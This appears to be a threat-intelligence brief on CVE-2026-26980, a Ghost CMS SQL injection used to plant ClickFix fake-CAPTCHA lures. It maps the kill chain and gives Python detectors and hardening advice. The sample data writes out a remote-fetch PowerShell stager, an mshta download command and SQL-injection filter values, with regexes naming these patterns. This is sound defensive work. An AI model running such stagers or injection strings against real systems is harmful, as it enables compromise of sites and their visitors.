ctipilot.ch


Ghost CMS CVE-2026-26980 → ClickFix: the CMS-compromise-to-endpoint kill chain

Notable vulnerability · discovered 2026-05-25 05:00 UTC · deep dive

Entities: SentinelOne

Part of run 2026-05-25-d675ef38 (intel · unknown)

Background. CVE-2026-26980 was disclosed and patched in Ghost 6.19.1 on 19 February 2026, and SentinelOne reported in-the-wild exploitation and detection guidance by 27 February (BleepingComputer, 2026-05-24). The May activity XLab documented is not a new bug but a large-scale weaponisation of the unpatched long tail of self-hosted instances, repurposing compromised editorial sites as a high-traffic, low-attributable delivery surface for ClickFix social engineering (XLab Qianxin, 2026-05-21). ClickFix / FakeCaptcha — tricking a user into pasting an attacker-supplied command into the Run dialog or a terminal — has been a tracked initial-access technique since 2024; what is notable here is the combination of a CVSS-9.4 pre-auth CMS flaw as the distribution mechanism with a fingerprinting/cloaking stage that keeps the lure invisible to non-targets and to casual review.

Kill chain → MITRE ATT&CK.

  • Initial access — T1190 Exploit Public-Facing Application. Unauthenticated boolean-based blind SQL injection through the Content API's slug filter parameter. The Content API is read-only and keyed by a key that is public by design, so no admin credentials and no user interaction are needed; the request pattern the vendor mitigation keys on is a query string containing slug:[ (slug%3A%5B).
  • Credential access — T1552 Unsecured Credentials. The injection is used to read an Admin API key out of Ghost's database. An Admin API key is an id:secret pair, and the secret signs the short-lived JWTs the Admin API accepts, so whoever holds it can mint valid admin tokens with full content-management scope at will. Its theft is the privilege pivot: there is no separate authentication step after extraction.
  • Content injection / defacement — T1659 Content Injection. With the admin key the attacker injects a lightweight JavaScript loader into published articles and/or theme templates, so the malicious code is served to every visitor from the site's own trusted origin.
  • Execution-guardrails cloaking — T1480 Execution Guardrails. The loader fetches a second-stage cloaking script that fingerprints each visitor and only proceeds for those matching the target profile (e.g. Windows desktop), so most visitors and most analysts never see the lure.
  • User execution — T1204.004 User Execution: Malicious Copy and Paste (not .002 Malicious File: the victim never opens a file), chained to T1059.001 PowerShell / T1059.003 Windows Command Shell. Qualifying visitors are shown a fake Cloudflare "verify you are human" prompt in an overlay iframe instructing them to paste a supplied command into the Windows Run dialog (Win+R) or a terminal.
  • Payload delivery — T1105 Ingress Tool Transfer. The pasted command pulls follow-on payloads; XLab observed DLL loaders, JavaScript droppers, and an Electron-based sample named UtilifySetup.exe, leading to info-stealer / RAT capability.

Detection concepts (no IOCs). Two distinct hunt surfaces:

  • Server-side, for Ghost operators. Review web-server / reverse-proxy access logs for Content API requests to /ghost/api/content/ whose filter parameter, decoded at least twice, contains slug:[ (slug%3A%5B) or boolean-blind SQL artefacts (AND n=n, CASE WHEN, SLEEP / BENCHMARK time-delay primitives). The vendor mitigation pattern is the highest-fidelity signal, with one caveat: slug:[a,b] is also valid NQL "in" syntax, so treat a hit as triage, not proof. In the Ghost admin audit trail, alert on unexpected article or theme modifications, on edits to Settings → Code injection (site header / footer, which renders into every page), and on any <script> element appearing in post content or theme files that has no editorial counterpart.
  • Client-side, for everyone (the product-agnostic, higher-value hunt). The ClickFix execution chain is independent of Ghost and is the artefact most defenders can actually catch: Sysmon Event ID 1 / Windows 4688 (with "Include command line in process creation events" enabled, otherwise 4688 carries no command line) for cmd.exe, powershell.exe or mshta.exe whose parent is a browser (chrome.exe, msedge.exe, firefox.exe, brave.exe), or whose parent is explorer.exe and whose command line carries -EncodedCommand, a curl / certutil / iwr download cradle, or a remote URL. The explorer.exe parent on its own is not a signal, since it parents every Start-menu and double-click launch as well as every Win+R launch; the command line is what separates a pasted stager from a user opening a terminal, and the Run dialog's own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU records what was typed and is a cheap triage artefact. Flag execution of unsigned Electron applications from user-writable paths. Enable PowerShell Script Block Logging (Event ID 4104) to capture the pasted stager body after decoding.
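Both hunts above, as an added example written for this brief (not ctipilot's, Ghost's or SentinelOne's code): one classifier for Content API requests in a common-log-format access log and one for Sysmon EID 1 / 4688-style process-creation events, run offline over constructed samples. The content key, IPs, hostnames and stager are all made up; the only attacker artefact assumed is the vendor-published slug:[ pattern, and the SQL and download-cradle markers are generic rather than taken from any reported sample.

```python
"""Offline hunt helpers for the two surfaces above. Added example, not ctipilot's,
Ghost's or SentinelOne's code; all log lines and events are constructed, and the
only attacker artefact assumed is the vendor pattern `slug:[` (slug%3A%5B)."""
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# ---- Surface 1: Content API requests in proxy / web-server access logs (CLF) ----
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Vendor mitigation pattern plus generic boolean-/time-based blind SQLi primitives.
SQLI_MARKERS = re.compile(
    r"slug:\[|\bAND\b\s+\d+\s*=\s*\d+|\bCASE\s+WHEN\b|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bpg_sleep\s*\(", re.IGNORECASE)

def classify_access_line(line):
    """Return a finding for a Content API request carrying SQLi markers, else None."""
    m = ACCESS_RE.match(line)
    if not m or "/ghost/api/content/" not in m.group("target"):
        return None
    for param, values in parse_qs(urlsplit(m.group("target")).query).items():
        for value in values:
            decoded = unquote(value)  # parse_qs decoded once; this catches slug%253A%255B
            hit = SQLI_MARKERS.search(decoded)
            if hit:
                return {"ip": m.group("ip"), "ts": m.group("ts"), "param": param,
                        "marker": hit.group(0), "value": decoded}
    return None

# ---- Surface 2: process-creation events (Sysmon EID 1 / Security 4688 fields) ----
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
CRADLE = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadstring|invoke-expression|iex|curl|certutil|bitsadmin|mshta)\b|https?://",
    re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Recover the body of powershell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_process_event(ev):
    """Return a finding for a shell launch with the ClickFix shape, else None."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in SHELLS:
        return None
    cmdline = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    reasons = []
    if parent in BROWSERS:
        reasons.append("shell spawned directly by " + parent)
    # explorer.exe parents every Win+R launch, but also every ordinary double-click and
    # Start-menu launch, so the parent alone is noise; the command line is the signal.
    if parent == "explorer.exe" and (decoded is not None or CRADLE.search(cmdline)):
        reasons.append("explorer.exe-parented shell with encoded command or download cradle")
    return {"image": image, "parent": parent, "reasons": reasons, "decoded": decoded} if reasons else None

# Constructed samples (not real traffic); example.invalid never resolves.
KEY = "22444f78447824223cefc48062"  # placeholder public Content API key
ACCESS_LOG = [
    f'198.51.100.9 - - [22/May/2026:03:14:09 +0000] "GET /ghost/api/content/posts/?key={KEY}&limit=5 HTTP/1.1" 200 4120',
    f'203.0.113.7 - - [22/May/2026:03:14:10 +0000] "GET /ghost/api/content/posts/?key={KEY}&filter=slug%3A%5Bhello-world%5D HTTP/1.1" 200 812',
    f'203.0.113.7 - - [22/May/2026:03:14:11 +0000] "GET /ghost/api/content/posts/?key={KEY}&filter=slug%3Ahello-world%20AND%201%3D1 HTTP/1.1" 200 812',
    f'203.0.113.7 - - [22/May/2026:03:14:12 +0000] "GET /ghost/api/content/posts/?key={KEY}&filter=slug%253A%255Bx%255D HTTP/1.1" 200 812',
    '198.51.100.9 - - [22/May/2026:03:14:13 +0000] "GET /hello-world/ HTTP/1.1" 200 18222',
]
STAGER = "iwr http://example.invalid/a.txt | iex"  # constructed stager body
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PROCESS_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": f"powershell -w hidden -e {ENCODED}"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "mshta http://example.invalid/v.hta"},
    {"Image": PS, "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "CommandLine": "powershell"},
]

def run_hunt(access_lines=ACCESS_LOG, events=PROCESS_EVENTS):
    """Apply both classifiers; returns (access_findings, process_findings)."""
    return ([f for f in map(classify_access_line, access_lines) if f],
            [f for f in map(classify_process_event, events) if f])

if __name__ == "__main__":
    for finding in run_hunt()[0] + run_hunt()[1]:
        print(finding)
```

Run as-is it reports three access-log hits (the plain, the boolean-blind and the double-encoded filter) and three process hits (the encoded stager, the mshta cradle and the browser-parented shell), while the benign Content API call and the bare cmd.exe launched from Win+R stay silent. Feed real data by pointing classify_access_line at proxy log lines and classify_process_event at dicts built from Sysmon or 4688 fields; the decoded field is what to pivot to 4104 script-block events on.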

Hardening / mitigation.

  • Ghost: upgrade to 6.19.1 or later; until then block slug:[ / slug%3A%5B at the WAF and, where the site does not depend on client-side Content API calls, restrict the public Content API to trusted origins. Assume every Admin API key was stolen on any internet-exposed instance: after patching, regenerate the Admin API key of every integration (Settings → Integrations), and audit all posts, theme files and the Code injection settings for injected scripts and overlay iframes.
  • Endpoint (the ClickFix surface, applies broadly): where operationally feasible, disable the Win+R Run dialog for standard users via the NoRun policy (GPO User Configuration → Administrative Templates → Start Menu and Taskbar → "Remove Run menu from Start Menu", which sets HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = 1); this does not stop a user pasting into a terminal they open themselves. Deploy detection for clipboard-to-shell execution, and run user-awareness that any web page asking you to "paste this command to prove you are human" is an attack. Constrained Language Mode (enforced through WDAC or AppLocker rather than the environment-variable switch, which is not tamper-resistant) plus full PowerShell logging reduces the blast radius of a successful paste.
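The post-compromise audit of posts and theme files, as an added example (not Ghost's or ctipilot's code): it scans post HTML and raw theme templates for script and iframe elements whose source is a foreign host outside an allowlist, or inline scripts with loader-style obfuscation markers. The site origin example.org, the allowlist, the hostnames and every post and template fragment are constructed for the example; the Admin API export step that would produce the post HTML is assumed, not shown.

```python
"""Audit exported Ghost content for injected scripts and overlay iframes.
Added example, not Ghost's or ctipilot's code; all samples are constructed and
example.org is the assumed site origin."""
import re
from urllib.parse import urlsplit

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Markers typical of a minified stage-one loader; editorial inline scripts rarely need them.
OBFUSCATION = re.compile(
    r"\batob\s*\(|\beval\s*\(|fromCharCode|document\.write\s*\(|\bunescape\s*\(|[A-Za-z0-9+/]{80,}={0,2}")

def external_host(src):
    """Host of an absolute or protocol-relative URL; '' for relative paths and {{asset}} helpers."""
    return urlsplit(src).netloc.lower()

def audit_markup(name, markup, allowed_hosts):
    """Return (name, kind, detail) for scripts/iframes with no editorial reason to exist."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(markup):
        src = SRC_RE.search(attrs)
        if src:
            host = external_host(src.group(1))
            # Same-origin / relative sources are checked by diffing the theme against its
            # release, not here; only foreign hosts outside the allowlist are flagged.
            if host and host not in allowed_hosts:
                findings.append((name, "external-script", src.group(1)))
        elif OBFUSCATION.search(body):
            findings.append((name, "obfuscated-inline-script", " ".join(body.split())[:80]))
    for attrs in IFRAME_RE.findall(markup):
        src = SRC_RE.search(attrs)
        host = external_host(src.group(1)) if src else ""
        if host and host not in allowed_hosts:
            findings.append((name, "external-iframe", src.group(1)))
    return findings

# Constructed samples: assumed site origin plus the embeds the editors actually use.
ALLOWED_HOSTS = {"example.org", "www.example.org", "www.youtube.com"}
POSTS = {  # post HTML as an Admin API export would return it (constructed)
    "hello-world": '<p>Welcome.</p><iframe src="https://www.youtube.com/embed/abc"></iframe>',
    "quarterly-update": '<p>Numbers below.</p><script src="//static.example.net/l.js"></script>',
    "about": '<p>Hi.</p><script>document.write(atob("Y29uc3RydWN0ZWQ="))</script>',
}
THEME_FILES = {  # fragments of theme templates (constructed); {{ghost_foot}} renders Code injection
    "default.hbs": '<script src="{{asset "built/main.js"}}"></script>{{ghost_foot}}',
    "post.hbs": '<script>window.__cfg={"a":1};</script><iframe src="https://pages.example.net/v"></iframe>',
}

def audit_site(posts=POSTS, theme_files=THEME_FILES, allowed_hosts=ALLOWED_HOSTS):
    """Audit every post and template; returns the combined finding list."""
    findings = []
    for name, html in posts.items():
        findings += audit_markup("post:" + name, html, allowed_hosts)
    for name, hbs in theme_files.items():
        findings += audit_markup("theme:" + name, hbs, allowed_hosts)
    return findings

if __name__ == "__main__":
    for finding in audit_site():
        print(finding)
```

The asset-helper and YouTube entries pass, the foreign loader, the document.write(atob(...)) inline script and the foreign iframe are reported. Paste the contents of Settings → Code injection (site header and footer) in as two more markup entries, since with the Admin API key an attacker can plant the loader there as easily as in a post.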


vulnerabilities actively-exploited pre-auth info-disclosure phishing infostealer global europe CVE-2026-26980